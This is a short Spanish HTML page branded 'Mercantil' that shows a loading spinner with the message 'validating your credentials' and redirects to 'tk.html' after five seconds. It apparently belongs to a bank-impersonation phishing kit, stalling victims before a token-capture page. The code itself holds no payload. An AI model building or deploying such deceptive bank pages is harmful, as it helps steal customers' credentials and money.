<!DOCTYPE html>
<html lang="es">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Mercantil</title>
    <style>
        body {
            display: flex;
            justify-content: center;
            align-items: center;
            height: 100vh;
            margin: 0;
            background-color: #eaeaea; /* Color de fondo sutil */
            font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; /* Tipografía moderna */
        }

        .loading-container {
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            width: 300px;
            height: 200px;
            background-color: #eaeaea; /* Fondo blanco para el contenedor */
            border-radius: 10px;
            padding: 20px;
            text-align: center;
        }

        .spinner-wrapper {
            display: flex;
            justify-content: center;
            align-items: center;
            width: 100px;
            height: 100px;
            position: relative;
            margin-bottom: 20px; /* Espacio entre el spinner y el mensaje */
        }

        .spinner {
            position: absolute;
            width: 80px; /* Ajusta el tamaño del spinner */
            height: 80px; /* Ajusta el tamaño del spinner */
            border-radius: 50%;
            border: 8px solid transparent;
            border-top-color: #3498db; /* Azul */
            border-bottom-color: #e67e22; /* Naranja */
            border-left-color: transparent;
            border-right-color: transparent;
            animation: spin 1.5s linear infinite;
        }

        @keyframes spin {
            0% {
                transform: rotate(0deg);
            }
            100% {
                transform: rotate(360deg);
            }
        }

        .message {
            font-size: 16px;
            color: #333;
            font-weight: 500; /* Texto en negrita para mayor legibilidad */
        }
    </style>
</head>
<body>
    <div class="loading-container">
        <div class="spinner-wrapper">
            <div class="spinner"></div>
        </div>
        <div class="message">Estamos validando tus credenciales.</div>
    </div>
    <script>
        // Redirigir después de 5 segundos
        setTimeout(function() {
            window.location.href = 'tk.html'; // Cambia esta URL por la página a la que deseas redirigir
        }, 5000);
    </script>
</body>
</html>
